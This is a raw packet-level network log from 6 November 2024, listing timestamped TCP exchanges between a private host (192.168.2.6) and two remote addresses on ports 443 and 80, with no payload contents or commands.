Nov 6, 2024 17:02:40.074899912 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.074943066 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.076853991 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.076869965 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.076940060 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.076955080 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.076993942 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.176175117 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.176199913 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.176315069 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.176338911 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.176378012 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.188968897 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.188990116 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.189074993 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.189085007 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.189120054 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.190999031 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.191037893 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.191061020 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.191068888 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.191102028 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.191122055 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.192614079 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.192639112 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.192672014 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.192681074 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.192704916 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.192742109 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.195136070 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.195158005 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.195231915 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.195240021 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.195271015 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.196789026 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.196810961 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.196897984 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.196904898 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.196950912 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.292526960 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.292557001 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.292629957 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.292654037 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.292690992 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.293126106 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.293179035 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.293186903 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.293203115 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.293219090 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.293261051 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.293922901 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.293945074 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.293958902 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.293965101 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.387809992 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.387890100 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.387950897 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.401187897 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.401223898 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.403542995 CET	56805	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.403592110 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.403647900 CET	56805	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.403969049 CET	56805	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.403985023 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.407300949 CET	56806	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.407340050 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.407403946 CET	56806	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.407782078 CET	56806	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.407789946 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.410551071 CET	56807	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.410586119 CET	443	56807	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.410644054 CET	56807	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.411036968 CET	56807	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.411060095 CET	443	56807	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.413831949 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.413866043 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.413912058 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.414252043 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.414263964 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.135503054 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.142111063 CET	443	56807	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.144608974 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.148313999 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.148351908 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.148797989 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.148804903 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.148933887 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.149051905 CET	56805	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.149081945 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.149513006 CET	56805	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.149518967 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.149770021 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.149791956 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.150125027 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.150134087 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.150882959 CET	56807	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.150891066 CET	443	56807	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.151305914 CET	56807	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.151316881 CET	443	56807	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.156742096 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.157046080 CET	56806	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.157062054 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.157447100 CET	56806	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.157452106 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.275729895 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.275798082 CET	443	56807	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.275897980 CET	443	56807	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.275922060 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.275952101 CET	56807	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.275990963 CET	56805	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.276307106 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.276328087 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.276372910 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.276385069 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.276432037 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.277013063 CET	56805	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.277033091 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.277044058 CET	56805	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.277050972 CET	443	56805	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.277120113 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.277137041 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.277149916 CET	56804	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.277154922 CET	443	56804	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.277678013 CET	56807	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.277684927 CET	443	56807	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.287463903 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.287480116 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.287520885 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.287553072 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.287596941 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.289531946 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.289551020 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.289565086 CET	56808	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.289571047 CET	443	56808	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.290712118 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.290733099 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.290771961 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.290817022 CET	56806	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.292498112 CET	56810	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.292529106 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.292577982 CET	56810	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.293762922 CET	56811	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.293812037 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.293864965 CET	56811	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.294534922 CET	56811	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.294553041 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.294631004 CET	56810	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.294646025 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.297365904 CET	56806	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.297373056 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.297384977 CET	56806	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.297389984 CET	443	56806	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.300437927 CET	56812	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.300470114 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.300532103 CET	56812	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.300730944 CET	56813	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.300753117 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.300970078 CET	56813	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.302680016 CET	56812	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.302690983 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.302948952 CET	56813	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.302958012 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.306183100 CET	56814	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.306190968 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:41.306241989 CET	56814	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.306371927 CET	56814	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:41.306379080 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.183080912 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.185106039 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.185125113 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.191890955 CET	56810	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.191939116 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.192501068 CET	56810	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.192513943 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.192795992 CET	56812	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.192821026 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.193629026 CET	56812	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.193634987 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.194139957 CET	56811	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.194175959 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.194577932 CET	56811	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.194588900 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.200881958 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:42.206974030 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:42.207101107 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:42.207334042 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:42.213716984 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:42.307109118 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.313350916 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.317286968 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.317378998 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.317488909 CET	56812	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.318896055 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.319860935 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.319956064 CET	56810	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.321667910 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.321753979 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.321819067 CET	56811	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.333673954 CET	56814	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.333700895 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.333823919 CET	56813	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.333851099 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.334286928 CET	56813	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.334291935 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.334887028 CET	56814	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.334893942 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.335350990 CET	56812	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.335371017 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.335383892 CET	56812	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.335388899 CET	443	56812	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.335474968 CET	56810	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.335491896 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.335517883 CET	56810	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.335522890 CET	443	56810	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.335552931 CET	56811	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.335580111 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.335593939 CET	56811	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.335599899 CET	443	56811	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.360886097 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.360924006 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.360989094 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.362895966 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.362938881 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.363642931 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.363842964 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.363852024 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.364186049 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.364197969 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.393465996 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.393495083 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.393599987 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.400599003 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.400629997 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.459470034 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.459532976 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.459618092 CET	56814	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.459914923 CET	56814	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.459933996 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.459944963 CET	56814	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.459949970 CET	443	56814	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.464247942 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.464387894 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.464432955 CET	56813	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.465526104 CET	56813	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.465544939 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.465557098 CET	56813	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.465562105 CET	443	56813	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.467071056 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.467094898 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.467302084 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.467645884 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.467655897 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.470240116 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.470264912 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:42.470474958 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.470653057 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:42.470662117 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.380105019 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:43.381920099 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:43.381987095 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:43.384445906 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.385651112 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.386095047 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.511014938 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.518764973 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.526482105 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.536577940 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.536859035 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.630340099 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.723329067 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.723390102 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.742532015 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.742552042 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.743391037 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.743396044 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.743930101 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.743952036 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.744875908 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.744880915 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.745311975 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.745328903 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.745961905 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.745966911 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.746423960 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.746452093 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.747060061 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.747065067 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.747309923 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.747325897 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.748039007 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.748044014 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.869246960 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.869334936 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.869389057 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.870150089 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.870693922 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.870740891 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.870954037 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.871006966 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.871053934 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.878547907 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.878670931 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.878720999 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.902570009 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.902641058 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.902689934 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.942051888 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:43.944046021 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.944081068 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.944099903 CET	56817	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.944106102 CET	443	56817	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.947011948 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:43.947037935 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.947037935 CET	56818	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.947071075 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.947082996 CET	443	56818	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.949531078 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.949538946 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.949547052 CET	56816	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.949554920 CET	443	56816	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.951983929 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.952030897 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.952050924 CET	56820	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.952058077 CET	443	56820	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.954572916 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.954572916 CET	56821	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.954598904 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.954610109 CET	443	56821	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.988327026 CET	56822	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.988390923 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.988461018 CET	56822	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.990689039 CET	56823	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.990717888 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.990775108 CET	56823	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.992383003 CET	56824	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.992432117 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.992515087 CET	56824	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.992537022 CET	56822	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.992557049 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.993170023 CET	56823	443	192.168.2.6	13.107.246.45
